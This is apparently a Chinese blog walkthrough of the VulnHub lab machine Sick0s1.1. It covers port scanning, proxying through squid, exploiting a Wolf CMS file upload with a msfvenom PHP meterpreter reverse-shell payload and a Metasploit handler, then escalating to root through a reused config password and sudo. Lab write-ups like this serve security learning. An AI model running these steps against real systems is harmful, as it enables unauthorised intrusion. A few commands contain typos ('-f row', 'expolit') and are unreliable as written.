VulnHub靶场篇13-Sick0s1.1

靶机地址:Sick0s1.1~ VulnHub
难易程度:1.5 / 10.0

文章简要记录渗透靶机每一个过程,对于渗透过程中的每一步并非十分的详细,其中部分内容会有错,望读者指出错误,谢谢!

摘要:扫描出80、3128端口,设置3128代理访问80端口,信息搜集后得知为wolfcms框架,google相关漏洞信息,有文件上传和代码执行漏洞,使用msfvenom生成反向连接脚本,上传后,在本地使用msf的监听模块,获取到低权限后,根据/etc/passwd和config.php文件登录进sickos用户,直接提权

待完善地方:weevely工具连接,g++编译文件

主机探测&端口扫描

靶机ip为:192.168.1.12

端口扫描结果:

hhh@Kali2020:~$ sudo nmap -sS -p- 192.168.1.12
[sudo] hhh 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-06 11:07 CST
Nmap scan report for sickos (192.168.1.12)
Host is up (0.00029s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:EA:11:1C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 104.47 seconds

信息搜集

这里直接访问80端口,并没有用,需要搭建代理,在firefox上面设置代理 192.168.1.12:3128

对网站进行扫描:

hhh@Kali2020:~$ nikto -h 192.168.1.12 -useproxy http://192.168.1.12:3128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.12
+ Target Hostname:    192.168.1.12
+ Target Port:        80
+ Proxy:              192.168.1.12:3128
+ Start Time:         2021-02-06 13:34:43 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Sat Dec  5 08:35:02 2015
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ 8726 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2021-02-06 13:40:21 (GMT8) (338 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

在robots.txt中有提示改网站框架为wolfcms

在google中搜索相关信息,搜索到文件上传|代码执行漏洞
Wolf CMS - Arbitrary File Upload / Execution

根据漏洞的演示进行权限获取

A)Login as regular user ( who have access upload functionality )

B)Go to this page  -
http://targetsite.com/wolfcms/?/admin/plugin/file_manager/browse/

C)Select upload an file option to upload Arbitary File ( filename ex:
"hello.php" )

D)Now you can access the file by here -
http://targetsite.com/wolfcms/public/hello.php

相关漏洞信息:

Wolf CMS 新旧两个版本中的文件上传漏洞分析

权限获取

之前学了weevely工具,在这里稍微使用,但是并没有用,可能一些细节知识没有掌握,也尝试使用菜刀和蚁剑进行尝试连接连接,但也没有用,过段时间再看

  1. 生成反向连接脚本reverse_tcp,设置本地kali的ip和端口号
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.15 lport=4444 -f row
  1. 写入文件shell.php

  2. 在上传页面上传该文件

192.168.1.12/wolfcms/?/admin/plugin/file_manager/browse/
  1. 本地开启监听
msfconsole	# 启动MSF
use exploit/multi/handler	# 使用模块
set payload php/meterpreter/reverse_tcp # 设置载荷
show options # 显示一些设置
set lhost 192.168.1.15
set lport 4444
expolit
  1. 在网站上打开该脚本
http://192.168.1.12/wolfcms/public/shell.php
  1. msf上面接收到反向连接的信息,输入shell即可建立连接

权限提升

这里一开始想使用dirtycow进行提权,但是靶机上没有g++,kali编译后和实际执行的环境并不一致,报错cannot execute binary file ,这个以后再分析分析

在目录下搜索到文件config.php,在里面查看到mysql密码

查看/etc/passwd文件,发现sickos用户为第一用户

尝试用刚刚的密码登录该用户

su sickos  # 切换用户

发现sickos的权限挺高

sudo -l  # 查看当前用户的sudo权限

直接进行权限获取

sudo -s  # 执行指定shell(passwd里面显示的shell)

sudo su:切换到root权限,环境也变化
sudo -s:切换到超级用户权限,但是使用原用户的环境

总结

  1. 代理3128端口
  2. wolfcms
  3. reverse_tcp
  4. /etc/passwd

参考

posted @ 2021-02-07 22:28  labster  阅读(334)  评论(0编辑  收藏  举报